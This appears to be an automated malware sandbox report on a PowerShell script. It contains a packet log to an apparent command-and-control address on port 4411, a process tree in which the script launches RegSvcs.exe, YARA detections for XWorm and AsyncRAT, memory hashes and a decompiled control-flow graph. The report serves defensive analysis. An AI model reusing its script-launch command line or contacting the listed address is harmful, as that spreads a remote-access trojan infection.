                                      Dec 29, 2024 09:51:00.731439114 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:00.892421007 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:00.892472029 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:01.011733055 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.052735090 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.053668976 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:01.172944069 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.222593069 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.223505974 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:01.342757940 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.342885971 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:01.383481979 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.462213993 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.462274075 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:01.581569910 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.582303047 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:01.701715946 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.851191044 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:01.852299929 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:01.972635984 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.013084888 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:02.132690907 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.138015985 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:02.142200947 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.300381899 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.300447941 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:02.419754982 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.465884924 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.466845989 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:02.586657047 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.630455971 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.644798040 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:02.905721903 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:02.905836105 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.038661957 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:03.158076048 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.158119917 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:03.277492046 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.393244028 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:03.512567043 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.513096094 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:03.632411003 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.665530920 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.666430950 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:03.828594923 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.875638008 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.876501083 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:03.995868921 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:03.995994091 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:03.996284008 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.075287104 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.156414032 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.159384012 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.278810978 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.278862953 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.398222923 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.466125965 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.504595041 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.575329065 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.585464001 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.585520983 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.704919100 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.706229925 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.715167999 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.762778044 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.796051025 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.796098948 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.868629932 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.868680000 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:04.915509939 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:04.925368071 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.028398037 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.028444052 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.125988960 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.126044035 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.147810936 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.147864103 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.182843924 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.183423042 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.267383099 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.271369934 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.336381912 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.448564053 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.451332092 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.570759058 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.572643042 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.575347900 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.740381956 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.743417978 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.781289101 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.781351089 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.862730980 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.862868071 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:05.900643110 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:05.905297995 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:06.024409056 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:06.024480104 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:06.144088984 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:06.270170927 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:06.372179985 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:06.480650902 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:06.559689999 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:06.693300009 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:06.872175932 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:29.367465973 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:29.419224977 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:38.504452944 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:38.623760939 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:38.623814106 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:38.743067980 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:38.955889940 CET44114973092.255.57.155192.168.2.4
                                      Dec 29, 2024 09:51:38.997235060 CET497304411192.168.2.492.255.57.155
                                      Dec 29, 2024 09:51:39.634541035 CET497304411192.168.2.492.255.57.155

                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:03:48:55
                                      Start date:29/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1"
                                      Imagebase:0x7ff788560000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:1
                                      Start time:03:48:55
                                      Start date:29/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:03:48:56
                                      Start date:29/12/2024
                                      Path:C:\Windows\System32\ipconfig.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                      Imagebase:0x7ff698f60000
                                      File size:35'840 bytes
                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:3
                                      Start time:03:48:57
                                      Start date:29/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                      Imagebase:0x510000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3280175291.0000000002882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:03:51:05
                                      Start date:29/12/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1736
                                      Imagebase:0x800000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702585231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b980000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbdcf41a754d7542396399cf7cc7061ab2e87f8ff29ceedca22929c57c6d63ca
                                        • Instruction ID: e9809a837bef08d71d0451905374376babbb0831a93e5b39dc1f1025985df51a
                                        • Opcode Fuzzy Hash: cbdcf41a754d7542396399cf7cc7061ab2e87f8ff29ceedca22929c57c6d63ca
                                        • Instruction Fuzzy Hash: A9C26A32B1EF991FE76A976858655B43BD1EF4A314B0A01FFD04DC71E3DA28AD068381
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702585231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b980000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f22e5d449296ec1407dbb84b3ab0eacecb58167aa6d651798ea42d4f947c4125
                                        • Instruction ID: 4c0d8146efdb62910942d884b3a774f99a02c90cebaf7dd73dd7d9b84c410f47
                                        • Opcode Fuzzy Hash: f22e5d449296ec1407dbb84b3ab0eacecb58167aa6d651798ea42d4f947c4125
                                        • Instruction Fuzzy Hash: A4510521B1EE9E1FEBA5CBAC44A46747BE1EF59214B0A01FBD40DC71E3DA28ED058341
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702585231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b980000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea191ddfd06abd330c5950d4fb883659c79072d156de0e91c3798cf692ba1ccd
                                        • Instruction ID: 5680bc64c4fefba2568f7a5743523caec736cf3acd55c90b7b4ab8c497fe89e5
                                        • Opcode Fuzzy Hash: ea191ddfd06abd330c5950d4fb883659c79072d156de0e91c3798cf692ba1ccd
                                        • Instruction Fuzzy Hash: E111573050EBC98FDB529F7498666943FB0FF13304F4A01EBD4988B0E3D6299958C742
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dbe3e2628ace07404ede23bf825c8add17f8fabd26f53346219fc2f9a39431e2
                                        • Instruction ID: 246382aa5e205c1c2ff4a52e4ce9720dffce23c295d98db3f9467fe9c0470064
                                        • Opcode Fuzzy Hash: dbe3e2628ace07404ede23bf825c8add17f8fabd26f53346219fc2f9a39431e2
                                        • Instruction Fuzzy Hash: 2D015271908A4D8FDF85EF68C858AEA7BF0FF28305F0505EAD419C72A5DB319644CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                        • Instruction ID: ad11833d54da4bcaa44fa23ccdbb85ddc80141cc9248b7fa53866c9f89e6517d
                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                        • Instruction Fuzzy Hash: 9C01A77020CB0D8FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1D632E882CB45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35644a4baa6827f1562d7df739c74998a0072b3f0b9791aadcf9f8980bf4d54e
                                        • Instruction ID: 868bce5fab28771c1230c5cceb3aedc3d34723227a06688b4547afd028c17223
                                        • Opcode Fuzzy Hash: 35644a4baa6827f1562d7df739c74998a0072b3f0b9791aadcf9f8980bf4d54e
                                        • Instruction Fuzzy Hash: C1F0FF7190E3CE8FEB929FA888696DA7FB0FF54200F0502E7D058C71A6DA3895448B81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9f9b31f7ddc2129060fcee6b9fd8aa25aa5c1da5565172bdfe26d18ba540154
                                        • Instruction ID: 36eadb9adf3926a88a204cff00e9afcbc521dad59ee513219a06665aab7dd5af
                                        • Opcode Fuzzy Hash: a9f9b31f7ddc2129060fcee6b9fd8aa25aa5c1da5565172bdfe26d18ba540154
                                        • Instruction Fuzzy Hash: D2F0657191564EDFEF91EFA89859AEAB7E0FF58304F100276E41CC2154DA3492518B81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d730a31d914068eb6916756a8a27227bfdcd3420b0582891c49177a4d0f683a7
                                        • Instruction ID: 9858d9177082238fe425f82fb021f4f8475b2eac5090197ad78d5d98ed06e291
                                        • Opcode Fuzzy Hash: d730a31d914068eb6916756a8a27227bfdcd3420b0582891c49177a4d0f683a7
                                        • Instruction Fuzzy Hash: A7F0D021A0E2DD4EE76367B458761E97FB09F46304F4E04FAD498C60B7D92856188B62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cdb5a43a80d9464f6c29531cbf5865f1751a0ec897a08ce1ab896b3ce31982d
                                        • Instruction ID: d8fe6fff7711ebc0fcee125c198e05b853f5d37b23f901e32132eb21d1ea3700
                                        • Opcode Fuzzy Hash: 5cdb5a43a80d9464f6c29531cbf5865f1751a0ec897a08ce1ab896b3ce31982d
                                        • Instruction Fuzzy Hash: C3D0EC25B0A02E8AE7212BF4653B1F93350DF09304F0A0139E41D414B78E2D271589A2

                                        Execution Graph

                                        Execution Coverage:15.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:70
                                        Total number of Limit Nodes:15
                                        execution_graph 20283 b37760 20285 b37766 20283->20285 20284 b37811 20285->20284 20288 b37b81 20285->20288 20295 b37a18 20285->20295 20293 b37b3a 20288->20293 20289 b37c1e 20289->20285 20293->20289 20294 b37f0c GlobalMemoryStatusEx 20293->20294 20302 b38140 20293->20302 20308 b37f05 20293->20308 20314 b38125 20293->20314 20294->20293 20297 b37a52 20295->20297 20296 b37c1e 20296->20285 20297->20296 20298 b38140 GlobalMemoryStatusEx 20297->20298 20299 b38125 GlobalMemoryStatusEx 20297->20299 20300 b37f05 GlobalMemoryStatusEx 20297->20300 20301 b37f0c GlobalMemoryStatusEx 20297->20301 20298->20297 20299->20297 20300->20297 20301->20297 20303 b38166 20302->20303 20304 b37f0c GlobalMemoryStatusEx 20303->20304 20305 b383b5 20303->20305 20306 b391b0 GlobalMemoryStatusEx 20303->20306 20307 b3fb02 GlobalMemoryStatusEx 20303->20307 20304->20303 20306->20303 20307->20303 20309 b37ea2 20308->20309 20311 b37e4f 20308->20311 20309->20308 20310 b37f0c GlobalMemoryStatusEx 20309->20310 20309->20311 20312 b391b0 GlobalMemoryStatusEx 20309->20312 20313 b3fb02 GlobalMemoryStatusEx 20309->20313 20310->20309 20311->20311 20312->20309 20313->20309 20315 b3812d 20314->20315 20316 b37f0c GlobalMemoryStatusEx 20315->20316 20317 b383b5 20315->20317 20318 b3fb02 GlobalMemoryStatusEx 20315->20318 20319 b391b0 GlobalMemoryStatusEx 20315->20319 20316->20315 20317->20317 20318->20315 20319->20315 20231 4d40910 20234 4d40963 20231->20234 20235 4d4091a 20234->20235 20236 4d40993 20234->20236 20236->20235 20238 b3fb02 20236->20238 20239 b3fb33 20238->20239 20241 b3fba7 20239->20241 20242 b37f0c 20239->20242 20243 b37ea2 20242->20243 20244 b37f0c GlobalMemoryStatusEx 20243->20244 20245 b37e4f 20243->20245 20247 b3fb02 GlobalMemoryStatusEx 20243->20247 20248 b391b0 20243->20248 20244->20243 20245->20245 20247->20243 20253 b3e843 20248->20253 20257 b3e82f 20248->20257 20261 b3e8a8 20248->20261 20249 b391b6 20254 b3e846 20253->20254 20255 b3eaed 20254->20255 20265 b3ee30 20254->20265 20255->20249 20258 b3e860 20257->20258 20259 b3eaed 20258->20259 20260 b3ee30 GlobalMemoryStatusEx 20258->20260 20259->20249 20260->20258 20262 b3e8c1 20261->20262 20263 b3eaed 20262->20263 20264 b3ee30 GlobalMemoryStatusEx 20262->20264 20263->20249 20264->20262 20269 b3ee8b 20265->20269 20274 b3ee98 20265->20274 20266 b3ee6e 20266->20254 20270 b3eea5 20269->20270 20271 b3eecd 20269->20271 20270->20266 20279 b3e5f8 20271->20279 20275 b3eea5 20274->20275 20276 b3eecd 20274->20276 20275->20266 20277 b3e5f8 GlobalMemoryStatusEx 20276->20277 20278 b3eeea 20277->20278 20278->20266 20280 b3ef70 GlobalMemoryStatusEx 20279->20280 20282 b3eeea 20280->20282 20282->20266

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4d43410-4d43446 124 4d43448 call 4d43410 0->124 125 4d43448 call 4d42de8 0->125 1 4d4344e-4d43454 2 4d434a4-4d434a8 1->2 3 4d43456-4d4345a 1->3 4 4d434bf-4d434d3 2->4 5 4d434aa-4d434b9 2->5 6 4d4345c-4d43461 3->6 7 4d43469-4d43470 3->7 12 4d434db-4d434e2 4->12 8 4d434e5-4d434ef 5->8 9 4d434bb-4d434bd 5->9 6->7 10 4d43546-4d43583 7->10 11 4d43476-4d4347d 7->11 13 4d434f1-4d434f7 8->13 14 4d434f9-4d434fd 8->14 9->12 21 4d43585-4d4358b 10->21 22 4d4358e-4d435ae 10->22 11->2 15 4d4347f-4d43483 11->15 16 4d43505-4d4353f 13->16 14->16 18 4d434ff 14->18 19 4d43485-4d4348a 15->19 20 4d43492-4d43499 15->20 16->10 18->16 19->20 20->10 23 4d4349f-4d434a2 20->23 21->22 28 4d435b5-4d435bc 22->28 29 4d435b0 22->29 23->12 31 4d435be-4d435c9 28->31 32 4d43944-4d4394d 29->32 33 4d43955-4d43962 31->33 34 4d435cf-4d435e2 31->34 39 4d435e4-4d435f2 34->39 40 4d435f8-4d43613 34->40 39->40 43 4d438cc-4d438d3 39->43 44 4d43615-4d4361b 40->44 45 4d43637-4d4363a 40->45 43->32 50 4d438d5-4d438d7 43->50 48 4d43624-4d43627 44->48 49 4d4361d 44->49 46 4d43794-4d4379a 45->46 47 4d43640-4d43643 45->47 51 4d43886-4d43889 46->51 52 4d437a0-4d437a5 46->52 47->46 53 4d43649-4d4364f 47->53 54 4d4365a-4d43660 48->54 55 4d43629-4d4362c 48->55 49->46 49->48 49->51 49->54 56 4d438e6-4d438ec 50->56 57 4d438d9-4d438de 50->57 60 4d43950 51->60 61 4d4388f-4d43895 51->61 52->51 53->46 59 4d43655 53->59 62 4d43666-4d43668 54->62 63 4d43662-4d43664 54->63 64 4d436c6-4d436cc 55->64 65 4d43632 55->65 56->33 58 4d438ee-4d438f3 56->58 57->56 66 4d438f5-4d438fa 58->66 67 4d43938-4d4393b 58->67 59->51 60->33 69 4d43897-4d4389f 61->69 70 4d438ba-4d438be 61->70 71 4d43672-4d4367b 62->71 63->71 64->51 68 4d436d2-4d436d8 64->68 65->51 66->60 72 4d438fc 66->72 67->60 79 4d4393d-4d43942 67->79 73 4d436de-4d436e0 68->73 74 4d436da-4d436dc 68->74 69->33 75 4d438a5-4d438b4 69->75 70->43 78 4d438c0-4d438c6 70->78 76 4d4367d-4d43688 71->76 77 4d4368e-4d436b6 71->77 80 4d43903-4d43908 72->80 81 4d436ea-4d43701 73->81 74->81 75->40 75->70 76->51 76->77 99 4d436bc-4d436c1 77->99 100 4d437aa-4d437e0 77->100 78->31 78->43 79->32 79->50 82 4d4392a-4d4392c 80->82 83 4d4390a-4d4390c 80->83 92 4d43703-4d4371c 81->92 93 4d4372c-4d43753 81->93 82->60 90 4d4392e-4d43931 82->90 87 4d4390e-4d43913 83->87 88 4d4391b-4d43921 83->88 87->88 88->33 91 4d43923-4d43928 88->91 90->67 91->82 95 4d438fe-4d43901 91->95 92->100 103 4d43722-4d43727 92->103 93->60 105 4d43759-4d4375c 93->105 95->60 95->80 99->100 106 4d437e2-4d437e6 100->106 107 4d437ed-4d437f5 100->107 103->100 105->60 108 4d43762-4d4378b 105->108 109 4d43805-4d43809 106->109 110 4d437e8-4d437eb 106->110 107->60 111 4d437fb-4d43800 107->111 108->100 123 4d4378d-4d43792 108->123 112 4d43828-4d4382c 109->112 113 4d4380b-4d43811 109->113 110->107 110->109 111->51 116 4d43836-4d43852 112->116 117 4d4382e-4d43834 112->117 113->112 115 4d43813-4d4381b 113->115 115->60 118 4d43821-4d43826 115->118 120 4d4385b-4d4385f 116->120 117->116 117->120 118->51 120->51 121 4d43861-4d4387d 120->121 121->51 123->100 124->1 125->1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                        • API String ID: 0-2525668591
                                        • Opcode ID: 6fa29c1a6f289a3774d2a2040fef6d5488d30dc031afdfc6e829d71206e5fe5f
                                        • Instruction ID: 4bed1fe7db9b332e1701ba9e14ba6a76657933616eb043b72652065c444bdbb7
                                        • Opcode Fuzzy Hash: 6fa29c1a6f289a3774d2a2040fef6d5488d30dc031afdfc6e829d71206e5fe5f
                                        • Instruction Fuzzy Hash: 01023971B00209DFDB14DFADC988AAEBBF2FF89310F158469E855AB261D734E941CB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 317 4d47948-4d4796a 318 4d47973-4d4799c 317->318 494 4d4796d call 4d49477 317->494 321 4d479a1-4d479b6 318->321 322 4d479bc 321->322 323 4d47e28-4d47e53 321->323 322->322 326 4d48104-4d48125 323->326 327 4d47e59-4d47e6f 323->327 333 4d48127-4d4813b 326->333 334 4d4813d-4d48147 326->334 330 4d47e76 327->330 332 4d47e7b-4d47e8a 330->332 335 4d47edc-4d47f08 332->335 336 4d47e8c 332->336 337 4d48151 333->337 334->337 345 4d49247-4d49281 335->345 346 4d47f0e-4d47f4f 335->346 336->330 336->335 338 4d47e93-4d47ea8 336->338 339 4d47eaa-4d47ebf 336->339 342 4d48293-4d482be 337->342 338->332 339->332 351 4d482c4-4d4833f 342->351 352 4d48381-4d483ac 342->352 372 4d49286-4d4928d 345->372 346->342 358 4d47f55 346->358 351->345 384 4d48345-4d48348 351->384 363 4d483ae-4d483ba 352->363 364 4d48428-4d48453 352->364 358->330 358->335 358->338 358->339 362 4d47d14-4d47d35 358->362 376 4d47d37-4d47d4b 362->376 377 4d47d4d-4d47d57 362->377 363->372 379 4d48459-4d484bf 364->379 380 4d4851b-4d48546 364->380 378 4d47d61-4d47d67 376->378 377->378 378->321 400 4d484ca-4d484ee 379->400 390 4d48548-4d48554 380->390 391 4d485a9-4d485ca 380->391 386 4d48354-4d48378 384->386 